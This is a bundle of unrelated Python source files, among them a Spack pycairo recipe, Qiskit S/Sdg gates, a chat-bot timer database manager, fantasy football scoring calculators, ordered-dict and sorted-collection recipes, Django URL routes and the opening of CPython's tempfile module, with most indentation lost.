# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
from spack import *
class PyPycairo(PythonPackage):
"""Pycairo is a set of Python bindings for the cairo graphics library."""
homepage = "https://www.cairographics.org/pycairo/"
pypi = "pycairo/pycairo-1.17.1.tar.gz"
version('1.20.0', sha256='5695a10cb7f9ae0d01f665b56602a845b0a8cb17e2123bfece10c2e58552468c')
version('1.18.1', sha256='70172e58b6bad7572a3518c26729b074acdde15e6fee6cbab6d3528ad552b786')
version('1.17.1', sha256='0f0a35ec923d87bc495f6753b1e540fd046d95db56a35250c44089fbce03b698')
depends_on('cairo@1.15.10: +pdf', when='@1.20.0:')
depends_on('cairo@1.13.1: +pdf', when='@:1.18.1')
depends_on('pkgconfig', type='build')
depends_on('py-setuptools', type='build')
depends_on('python@2.7:2.8,3.3:', when='@:1.17.1', type=('build', 'run'))
depends_on('python@2.7:2.8,3.4:3.7', when='@1.18.1:1.19', type=('build', 'run'))
depends_on('python@3.6:3', when='@1.20.0:', type=('build', 'run'))
@run_after('install')
def post_install(self):
src = self.prefix.lib + '/pkgconfig/py3cairo.pc'
dst = self.prefix.lib + '/pkgconfig/pycairo.pc'
if os.path.exists(src) and not os.path.exists(dst):
copy(src, dst)
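# Illustrative usage (a sketch, not part of the package recipe; assumes a
# working Spack installation and that this spec syntax matches your Spack
# version):
#   spack install py-pycairo@1.20.0
#   spack load py-pycairo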
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""The S and Sdg gate."""
import numpy
from qiskit.qasm import pi
from qiskit.circuit.gate import Gate
from qiskit.circuit.quantumregister import QuantumRegister
class SGate(Gate):
r"""Single qubit S gate (Z**0.5).
It induces a :math:`\pi/2` phase, and is sometimes called the P gate (phase).
This is a Clifford gate and a square-root of Pauli-Z.
**Matrix Representation:**
.. math::
S = \begin{pmatrix}
1 & 0 \\
0 & i
\end{pmatrix}
**Circuit symbol:**
.. parsed-literal::
     ┌───┐
q_0: ┤ S ├
     └───┘
Equivalent to a :math:`\pi/2` radian rotation about the Z axis.
"""
def __init__(self, label=None):
"""Create new S gate."""
super().__init__('s', 1, [], label=label)
def _define(self):
"""
gate s a { u1(pi/2) a; }
"""
# pylint: disable=cyclic-import
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .u1 import U1Gate
q = QuantumRegister(1, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(U1Gate(pi / 2), [q[0]], [])
]
qc._data = rules
self.definition = qc
def inverse(self):
"""Return inverse of S (SdgGate)."""
return SdgGate()
def to_matrix(self):
"""Return a numpy.array for the S gate."""
return numpy.array([[1, 0],
[0, 1j]], dtype=complex)
class SdgGate(Gate):
r"""Single qubit S-adjoint gate (~Z**0.5).
It induces a :math:`-\pi/2` phase.
This is a Clifford gate and a square-root of Pauli-Z.
**Matrix Representation:**
.. math::
Sdg = \begin{pmatrix}
1 & 0 \\
0 & -i
\end{pmatrix}
**Circuit symbol:**
.. parsed-literal::
     ┌─────┐
q_0: ┤ Sdg ├
     └─────┘
Equivalent to a :math:`-\pi/2` radian rotation about the Z axis.
"""
def __init__(self, label=None):
"""Create new Sdg gate."""
super().__init__('sdg', 1, [], label=label)
def _define(self):
"""
gate sdg a { u1(-pi/2) a; }
"""
# pylint: disable=cyclic-import
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .u1 import U1Gate
q = QuantumRegister(1, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(U1Gate(-pi / 2), [q[0]], [])
]
qc._data = rules
self.definition = qc
def inverse(self):
"""Return inverse of Sdg (SGate)."""
return SGate()
def to_matrix(self):
"""Return a numpy.array for the Sdg gate."""
return numpy.array([[1, 0],
[0, -1j]], dtype=complex)
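# Illustrative check (a sketch, not part of the original module): the matrices
# defined above satisfy S * Sdg == I and S**2 == Z, confirming that SdgGate is
# the inverse of SGate and that S is a square root of Pauli-Z.
if __name__ == '__main__':
    _s = SGate().to_matrix()
    _sdg = SdgGate().to_matrix()
    assert numpy.allclose(_s @ _sdg, numpy.eye(2))       # S * Sdg == identity
    assert numpy.allclose(_s @ _s, numpy.diag([1, -1]))  # S**2 == Pauli-Z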
|
"""Data manager for the timers."""
from datetime import datetime, timedelta
from typing import Optional, List
import pymongo
from bson import ObjectId
from models import TimerModel, TimerListResult, OID_KEY
from mongodb.factory.results import WriteOutcome
from extutils.checker import arg_type_ensure
from extutils.locales import UTC
from extutils.dt import is_tz_naive, now_utc_aware, make_tz_aware
from JellyBot.systemconfig import Bot
from ._base import BaseCollection
__all__ = ("TimerManager",)
DB_NAME = "timer"
class _TimerManager(BaseCollection):
database_name = DB_NAME
collection_name = "timer"
model_class = TimerModel
def build_indexes(self):
self.create_index(TimerModel.Keyword.key)
self.create_index(TimerModel.DeletionTime.key, expireAfterSeconds=0)
@arg_type_ensure
def add_new_timer(
self, ch_oid: ObjectId, keyword: str, title: str, target_time: datetime, *,
countup: bool = False, period_sec: int = 0) -> WriteOutcome:
"""`target_time` is recommended to be tz-aware. Tzinfo will be forced to be UTC if tz-naive."""
# Force target time to be tz-aware in UTC
if is_tz_naive(target_time):
target_time = make_tz_aware(target_time, UTC.to_tzinfo())
mdl = TimerModel(
ChannelOid=ch_oid, Keyword=keyword, Title=title, TargetTime=target_time,
Countup=countup, PeriodSeconds=period_sec)
if not countup:
mdl.deletion_time = target_time + timedelta(days=Bot.Timer.AutoDeletionDays)
mdl.deletion_time = make_tz_aware(mdl.deletion_time, target_time.tzinfo)
outcome, _ = self.insert_one_model(mdl)
return outcome
@arg_type_ensure
def del_timer(self, timer_oid: ObjectId) -> bool:
"""
Delete the timer by its OID.
:param timer_oid: OID of the timer to be deleted
:return: whether the timer was successfully deleted
"""
return self.delete_one({OID_KEY: timer_oid}).deleted_count > 0
@arg_type_ensure
def list_all_timer(self, channel_oid: ObjectId) -> TimerListResult:
"""
List all the timers in the channel ``channel_oid``.
All timers in the returned result will be sorted by their target time (ASC).
:param channel_oid: channel of the timers
:return: a `TimerListResult` containing the timers that match the conditions
"""
return TimerListResult(
self.find_cursor_with_count(
{TimerModel.ChannelOid.key: channel_oid},
sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]
)
)
@arg_type_ensure
def get_timers(self, channel_oid: ObjectId, keyword: str) -> TimerListResult:
"""
Get the timers in the channel ``channel_oid`` whose keyword is ``keyword``.
``keyword`` needs to be an exact match, **NOT** a partial match.
All timers in the returned result will be sorted by their target time (ASC).
:param channel_oid: channel of the timers
:param keyword: keyword of the timers
:return: a `TimerListResult` containing the timers that match the conditions
"""
return TimerListResult(
self.find_cursor_with_count(
{TimerModel.Keyword.key: keyword, TimerModel.ChannelOid.key: channel_oid},
sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]
)
)
@arg_type_ensure
def get_notify(self, channel_oid: ObjectId, within_secs: Optional[int] = None) -> List[TimerModel]:
"""
Get a list of unnotified timers in ``channel_oid`` that will time up within ``within_secs`` seconds.
Returned timers will be sorted by their target time (ASC).
:param channel_oid: channel of the timers
:param within_secs: timers that will time up within this number of seconds will be returned
:return: a list of timers that are not yet notified and will time up within `within_secs` seconds
"""
now = now_utc_aware()
filter_ = {
TimerModel.ChannelOid.key: channel_oid,
TimerModel.TargetTime.key: {
"$lt": now + timedelta(seconds=within_secs if within_secs else Bot.Timer.MaxNotifyRangeSeconds),
"$gt": now
},
TimerModel.Notified.key: False
}
ret = list(self.find_cursor_with_count(filter_, sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]))
self.update_many_async(filter_, {"$set": {TimerModel.Notified.key: True}})
return ret
@arg_type_ensure
def get_time_up(self, channel_oid: ObjectId) -> List[TimerModel]:
"""
Get a list of unnotified timers in ``channel_oid`` that have already timed up.
All timers in the returned result will be sorted by their target time (ASC).
:param channel_oid: channel of the timers
:return: a list of timers that are not yet notified and have already timed up
"""
now = now_utc_aware()
filter_ = {
TimerModel.ChannelOid.key: channel_oid,
TimerModel.TargetTime.key: {"$lt": now},
TimerModel.NotifiedExpired.key: False
}
ret = list(self.find_cursor_with_count(filter_, sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]))
self.update_many_async(filter_, {"$set": {TimerModel.NotifiedExpired.key: True}})
return ret
@staticmethod
def get_notify_within_secs(message_frequency: float):
"""
Get a time range calculated from ``message_frequency``, which can be used to get the timers for notification.
Calculation formula: **message frequency x 20 + 600**
If the calculated result is greater than ``Bot.Timer.MaxNotifyRangeSeconds``,
then ``Bot.Timer.MaxNotifyRangeSeconds`` will be returned instead.
:param message_frequency: message frequency in seconds per message
:return: time range to be used to get the timers for notification
"""
return min(message_frequency * 20 + 600, Bot.Timer.MaxNotifyRangeSeconds)
TimerManager = _TimerManager()
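# Worked example for get_notify_within_secs (the values are assumptions for
# illustration only): with message_frequency = 12.5 seconds per message the
# raw range is 12.5 * 20 + 600 = 850 seconds; if Bot.Timer.MaxNotifyRangeSeconds
# were 21600, min(850, 21600) returns 850, so timers due within the next
# 850 seconds would be picked up by get_notify().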
|
from daily_fantasy_sports_scoring_calculators.core.calculators.scoring import StatisticalCategoryPointsCalculator, \
StatisticalValueCalculator
from daily_fantasy_sports_scoring_calculators.draft_kings.nfl.scoring.calculators.value_to_points.offensive import \
PassingTouchdownsCalculator as PassingTouchdownsPointsCalculator, \
HasAchievedAtLeast300YardsCalculator as HasAchievedAtLeast300PassingYardsPointsCalculator, \
PassingYardageCalculator as PassingYardagePointsCalculator, \
HasAchievedAtLeast100YardsCalculator as HasAchievedAtLeast100YardsPointsCalculator, \
NonPassingTouchdownsCalculator as NonPassingTouchdownsPointsCalculator, \
NonPassingYardsCalculator as NonPassingYardsPointsCalculator, \
TurnoversCalculator as TurnoversPointsCalculator, \
TwoPointConversionsCalculator as TwoPointConversionsPointsCalculator, \
ReceptionsCalculator as ReceptionsPointsCalculator
from daily_fantasy_sports_scoring_calculators.draft_kings.nfl.statistics.calculators.offensive import \
PassingTouchdownsCalculator as PassingTouchdownsValueCalculator, \
HasAchievedMinimumYardageRequirementCalculator as HasAchievedMinimumYardageRequirementValueCalculator, \
InterceptionsCalculator as InterceptionsValueCalculator, \
RushingTouchdownsCalculator as RushingTouchdownsValueCalculator, \
RushingYardageCalculator as RushingYardageValueCalculator, \
ReceivingTouchdownsCalculator as ReceivingTouchdownsValueCalculator, \
ReceptionsCalculator as ReceptionsValueCalculator, \
KickoffsReturnTouchdownsCalculator as KickoffsReturnTouchdownsValueCalculator, \
PuntReturnTouchdownsCalculator as PuntReturnTouchdownsValueCalculator, \
FieldGoalReturnTouchdownsCalculator as FieldGoalReturnTouchdownsValueCalculator, \
FumblesLostCalculator as FumblesLostValueCalculator, \
TwoPointConversionsCaughtCalculator as TwoPointConversionsCaughtValueCalculator, \
TwoPointConversionsRushedCalculator as TwoPointConversionsRushedValueCalculator, \
TwoPointConversionsThrownCalculator as TwoPointConversionsThrownValueCalculator, \
FumbleRecoveryTouchdownsCalculator as FumbleRecoveryTouchdownsValueCalculator, \
ReceivingYardageCalculator as ReceivingYardageValueCalculator, \
PassingYardageCalculator as PassingYardageValueCalculator
passing_yardage_value_calculator = PassingYardageValueCalculator()
receiving_yardage_value_calculator = ReceivingYardageValueCalculator()
rushing_yardage_value_calculator = RushingYardageValueCalculator()
non_passing_yards_points_calculator = NonPassingYardsPointsCalculator()
class PassingTouchdownsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
PassingTouchdownsValueCalculator(),
PassingTouchdownsPointsCalculator())
class NonPassingTouchdownsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, NonPassingTouchdownsPointsCalculator())
class HasAchievedAtLeast300PassingYardsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=passing_yardage_value_calculator,
minimum_inclusive_required_yardage=300
),
HasAchievedAtLeast300PassingYardsPointsCalculator()
)
class PassingYardageCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
passing_yardage_value_calculator,
PassingYardagePointsCalculator())
class TurnoversCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, TurnoversPointsCalculator())
def __eq__(self, o: object) -> bool:
if isinstance(o, TurnoversCalculator):
return o.value_calculator == self.value_calculator and super().__eq__(o)
return False
def __hash__(self):
return hash((self.value_calculator, super().__hash__()))
class InterceptionsCalculator(TurnoversCalculator):
def __init__(self):
super().__init__(InterceptionsValueCalculator())
class RushingTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(RushingTouchdownsValueCalculator())
class RushingYardageCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
rushing_yardage_value_calculator,
non_passing_yards_points_calculator)
class HasReached100YardsRushingPointsLimit(
StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=rushing_yardage_value_calculator,
minimum_inclusive_required_yardage=100
),
HasAchievedAtLeast100YardsPointsCalculator()
)
class ReceivingTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(ReceivingTouchdownsValueCalculator())
class ReceivingYardsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
receiving_yardage_value_calculator,
non_passing_yards_points_calculator)
class HasReached100YardsReceivingCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
value_calculator=HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=receiving_yardage_value_calculator,
minimum_inclusive_required_yardage=100),
points_calculator=HasAchievedAtLeast100YardsPointsCalculator())
class ReceptionsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(ReceptionsValueCalculator(), ReceptionsPointsCalculator())
class PuntReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(PuntReturnTouchdownsValueCalculator())
class KickReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(KickoffsReturnTouchdownsValueCalculator())
class FieldGoalReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(FieldGoalReturnTouchdownsValueCalculator())
class FumblesLostCalculator(TurnoversCalculator):
def __init__(self):
super().__init__(FumblesLostValueCalculator())
class TwoPointConversionCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, TwoPointConversionsPointsCalculator())
def __eq__(self, o: object) -> bool:
if isinstance(o, TwoPointConversionCalculator):
return o.value_calculator == self.value_calculator and super().__eq__(o)
return False
def __hash__(self):
return hash((self.value_calculator, super().__hash__()))
class TwoPointConversionsThrownCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsThrownValueCalculator())
class TwoPointConversionsCaughtCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsCaughtValueCalculator())
class TwoPointConversionsRushedCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsRushedValueCalculator())
class FumbleRecoveryTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(FumbleRecoveryTouchdownsValueCalculator())
|
# Copyright (c) 2009 Raymond Hettinger
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
from urllib.parse import parse_qsl
from collections import defaultdict
from collections.abc import Callable
try:
    from UserDict import UserDict
    from UserDict import DictMixin
except ImportError:
    from collections import UserDict
    from collections.abc import MutableMapping as DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.__map = {} # key --> [key, prev, next]
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = next(reversed(self))
else:
key = next(iter(self))
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
#iterkeys = DictMixin.iterkeys
#itervalues = DictMixin.itervalues
#iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
if len(self) != len(other):
return False
for p, q in zip(self.items(), other.items()):
if p != q:
return False
return True
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
"""
<http://stackoverflow.com/questions/6190331/can-i-do-an-ordered-default-dict-in-python>
"""
class DefaultOrderedDict(OrderedDict):
def __init__(self, default_factory=None, *a, **kw):
if (default_factory is not None and
not isinstance(default_factory, Callable)):
raise TypeError('first argument must be callable')
OrderedDict.__init__(self, *a, **kw)
self.default_factory = default_factory
def __getitem__(self, key):
try:
return OrderedDict.__getitem__(self, key)
except KeyError:
return self.__missing__(key)
def __missing__(self, key):
if self.default_factory is None:
raise KeyError(key)
self[key] = value = self.default_factory()
return value
def __reduce__(self):
if self.default_factory is None:
args = tuple()
else:
args = self.default_factory,
return type(self), args, None, None, self.items()
def copy(self):
return self.__copy__()
def __copy__(self):
return type(self)(self.default_factory, self)
def __deepcopy__(self, memo):
import copy
return type(self)(self.default_factory,
copy.deepcopy(self.items()))
def __repr__(self):
return 'DefaultOrderedDict(%s, %s)' % (self.default_factory,
OrderedDict.__repr__(self))
def parse_qs(qs, keep_blank_values=0, strict_parsing=0, keep_attr_order=True):
"""
Kind of like urllib.parse.parse_qs, except it returns an ordered dict.
Also avoids replicating that function's bad habit of overriding the
built-in 'dict' type.
Taken from below with modification:
<https://bitbucket.org/btubbs/thumpy/raw/8cdece404f15/thumpy.py>
"""
od = DefaultOrderedDict(list) if keep_attr_order else defaultdict(list)
for name, value in parse_qsl(qs, keep_blank_values, strict_parsing):
od[name].append(value)
return od
"""
Recipe from <http://code.activestate.com/recipes/577197-sortedcollection/>.
"""
from bisect import bisect_left, bisect_right
class SortedCollection(object):
'''Sequence sorted by a key function.
SortedCollection() is much easier to work with than using bisect() directly.
It supports key functions like those used in sorted(), min(), and max().
The result of the key function call is saved so that keys can be searched
efficiently.
Instead of returning an insertion-point which can be hard to interpret, the
five find-methods return a specific item in the sequence. They can scan for
exact matches, the last item less-than-or-equal to a key, or the first item
greater-than-or-equal to a key.
Once found, an item's ordinal position can be located with the index() method.
New items can be added with the insert() and insert_right() methods.
Old items can be deleted with the remove() method.
The usual sequence methods are provided to support indexing, slicing,
length lookup, clearing, copying, forward and reverse iteration, contains
checking, item counts, item removal, and a nice looking repr.
Finding and indexing are O(log n) operations while iteration and insertion
are O(n). The initial sort is O(n log n).
The key function is stored in the 'key' attribute for easy introspection or
so that you can assign a new key function (triggering an automatic re-sort).
In short, the class was designed to handle all of the common use cases for
bisect but with a simpler API and support for key functions.
>>> from pprint import pprint
>>> from operator import itemgetter
>>> s = SortedCollection(key=itemgetter(2))
>>> for record in [
... ('roger', 'young', 30),
... ('angela', 'jones', 28),
... ('bill', 'smith', 22),
... ('david', 'thomas', 32)]:
... s.insert(record)
>>> pprint(list(s)) # show records sorted by age
[('bill', 'smith', 22),
('angela', 'jones', 28),
('roger', 'young', 30),
('david', 'thomas', 32)]
>>> s.find_le(29) # find oldest person aged 29 or younger
('angela', 'jones', 28)
>>> s.find_lt(28) # find oldest person under 28
('bill', 'smith', 22)
>>> s.find_gt(28) # find youngest person over 28
('roger', 'young', 30)
>>> r = s.find_ge(32) # find youngest person aged 32 or older
>>> s.index(r) # get the index of their record
3
>>> s[3] # fetch the record at that index
('david', 'thomas', 32)
>>> s.key = itemgetter(0) # now sort by first name
>>> pprint(list(s))
[('angela', 'jones', 28),
('bill', 'smith', 22),
('david', 'thomas', 32),
('roger', 'young', 30)]
'''
def __init__(self, iterable=(), key=None):
self._given_key = key
key = (lambda x: x) if key is None else key
decorated = sorted((key(item), item) for item in iterable)
self._keys = [k for k, item in decorated]
self._items = [item for k, item in decorated]
self._key = key
def _getkey(self):
return self._key
def _setkey(self, key):
if key is not self._key:
self.__init__(self._items, key=key)
def _delkey(self):
self._setkey(None)
key = property(_getkey, _setkey, _delkey, 'key function')
def clear(self):
self.__init__([], self._key)
def copy(self):
return self.__class__(self, self._key)
def __len__(self):
return len(self._items)
def __getitem__(self, i):
return self._items[i]
def __iter__(self):
return iter(self._items)
def __reversed__(self):
return reversed(self._items)
def __repr__(self):
return '%s(%r, key=%s)' % (
self.__class__.__name__,
self._items,
getattr(self._given_key, '__name__', repr(self._given_key))
)
def __reduce__(self):
return self.__class__, (self._items, self._given_key)
def __contains__(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return item in self._items[i:j]
def index(self, item):
'Find the position of an item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].index(item) + i
def count(self, item):
'Return number of occurrences of item'
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].count(item)
def insert(self, item):
'Insert a new item. If equal keys are found, add to the left'
k = self._key(item)
i = bisect_left(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def insert_right(self, item):
'Insert a new item. If equal keys are found, add to the right'
k = self._key(item)
i = bisect_right(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def remove(self, item):
'Remove first occurrence of item. Raise ValueError if not found'
i = self.index(item)
del self._keys[i]
del self._items[i]
def find(self, item):
'Return first item with a key == item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
if i != len(self) and self._keys[i] == k:
return self._items[i]
raise ValueError('No item found with key equal to: %r' % (k,))
def find_le(self, item):
'Return last item with a key <= item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_right(self._keys, k)
if i:
return self._items[i - 1]
raise ValueError('No item found with key at or below: %r' % (k,))
def find_lt(self, item):
'Return last item with a key < item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
if i:
return self._items[i - 1]
raise ValueError('No item found with key below: %r' % (k,))
def find_ge(self, item):
'Return first item with a key >= item. Raise ValueError if not found'
k = self._key(item)
i = bisect_left(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key at or above: %r' % (k,))
def find_gt(self, item):
'Return first item with a key > item. Raise ValueError if not found'
k = self._key(item)
i = bisect_right(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key above: %r' % (k,))
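# Illustrative sketch (not part of the original recipes): parse_qs above keeps
# parameters in the order they appear in the query string, and repeated
# parameters accumulate into lists.
if __name__ == '__main__':
    _od = parse_qs('b=2&a=1&a=3')
    assert list(_od) == ['b', 'a']     # insertion order preserved
    assert _od['a'] == ['1', '3']      # repeated parameters accumulate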
|
# -*- coding: utf-8 -*-
# @Time : 2021/2/10 12:59
# @Author : εΈδΊδΈ
# @File : urls.py
# @Software: Pycharm
from django.conf import settings
from django.urls import path, include
from manager_app.apis.auth_api import ManagerLoginApiView, ManagerRegisterApiView
from manager_app.apis.manage_carousel_api import ManageCarouselApiView
from manager_app.apis.manage_commodity_api import ManagerCommodityCategoryApiView, ManageCommodityGroupApiView
from manager_app.apis.manage_permission_api import ManagePermissionApiView
from manager_app.apis.manage_role_api import ManageRoleApiView
from manager_app.apis.manage_seller_api import ManagerSellerPermApiView, ManagerSellerRoleApiView
app_name = "manager_app"
auth_patterns = [
path('login/', ManagerLoginApiView.as_view()),
path('register/', ManagerRegisterApiView.as_view()),
]
urlpatterns = [
path(f'{settings.URL_PREFIX}/auth/', include(auth_patterns)),
path(f'{settings.URL_PREFIX}/role/', ManageRoleApiView.as_view()),
path(f'{settings.URL_PREFIX}/permission/', ManagePermissionApiView.as_view()),
path(f'{settings.URL_PREFIX}/commodity-category/', ManagerCommodityCategoryApiView.as_view()),
path(f'{settings.URL_PREFIX}/commodity-group/', ManageCommodityGroupApiView.as_view()),
path(f'{settings.URL_PREFIX}/role/seller/', ManagerSellerRoleApiView.as_view()),
path(f'{settings.URL_PREFIX}/permission/seller/', ManagerSellerPermApiView.as_view()),
path(f'{settings.URL_PREFIX}/carousel/', ManageCarouselApiView.as_view())
]
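# Illustrative wiring (a sketch; the project-level urls module and the
# 'manager/' prefix are assumptions, not part of this app): in the project's
# ROOT_URLCONF you would include this module, e.g.
#   path('manager/', include('manager_app.urls', namespace='manager_app'))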
|
"""Temporary files.
This module provides generic, low- and high-level interfaces for
creating temporary files and directories. All of the interfaces
provided by this module can be used without fear of race conditions
except for 'mktemp'. 'mktemp' is subject to race conditions and
should not be used; it is provided for backward compatibility only.
The default path names are returned as str. If you supply bytes as
input, all return values will be in bytes. Ex:
>>> tempfile.mkstemp()
(4, '/tmp/tmptpu9nin8')
>>> tempfile.mkdtemp(suffix=b'')
b'/tmp/tmppbi8f0hy'
This module also provides some data items to the user:
TMP_MAX - maximum number of names that will be tried before
giving up.
tempdir - If this is set to a string before the first use of
any routine from this module, it will be considered as
another candidate location to store temporary files.
"""
__all__ = [
"NamedTemporaryFile", "TemporaryFile", # high level safe interfaces
"SpooledTemporaryFile", "TemporaryDirectory",
"mkstemp", "mkdtemp", # low level safe interfaces
"mktemp", # deprecated unsafe interface
"TMP_MAX", "gettempprefix", # constants
"tempdir", "gettempdir",
"gettempprefixb", "gettempdirb",
]
# Imports.
import functools as _functools
import warnings as _warnings
import io as _io
import os as _os
import shutil as _shutil
import errno as _errno
from random import Random as _Random
import weakref as _weakref
try:
import _thread
except ImportError:
import _dummy_thread as _thread
_allocate_lock = _thread.allocate_lock
_text_openflags = _os.O_RDWR | _os.O_CREAT | _os.O_EXCL
if hasattr(_os, 'O_NOFOLLOW'):
_text_openflags |= _os.O_NOFOLLOW
_bin_openflags = _text_openflags
if hasattr(_os, 'O_BINARY'):
_bin_openflags |= _os.O_BINARY
if hasattr(_os, 'TMP_MAX'):
TMP_MAX = _os.TMP_MAX
else:
TMP_MAX = 10000
# This variable _was_ unused for legacy reasons, see issue 10354.
# But as of 3.5 we actually use it at runtime so changing it would
# have a possibly desirable side effect... But we do not want to support
# that as an API. It is undocumented on purpose. Do not depend on this.
template = "tmp"
# Internal routines.
_once_lock = _allocate_lock()
if hasattr(_os, "lstat"):
_stat = _os.lstat
elif hasattr(_os, "stat"):
_stat = _os.stat
else:
# Fallback. All we need is something that raises OSError if the
# file doesn't exist.
def _stat(fn):
fd = _os.open(fn, _os.O_RDONLY)
_os.close(fd)
def _exists(fn):
try:
_stat(fn)
except OSError:
return False
else:
return True
def _infer_return_type(*args):
"""Look at the type of all args and divine their implied return type."""
return_type = None
for arg in args:
if arg is None:
continue
if isinstance(arg, bytes):
if return_type is str:
raise TypeError("Can't mix bytes and non-bytes in "
"path components.")
return_type = bytes
else:
if return_type is bytes:
raise TypeError("Can't mix bytes and non-bytes in "
"path components.")
return_type = str
if return_type is None:
return str # tempfile APIs return a str by default.
return return_type
def _sanitize_params(prefix, suffix, dir):
"""Common parameter processing for most APIs in this module."""
output_type = _infer_return_type(prefix, suffix, dir)
if suffix is None:
suffix = output_type()
if prefix is None:
if output_type is str:
prefix = template
else:
prefix = _os.fsencode(template)
if dir is None:
if output_type is str:
dir = gettempdir()
else:
dir = gettempdirb()
return prefix, suffix, dir, output_type
class _RandomNameSequence:
"""An instance of _RandomNameSequence generates an endless
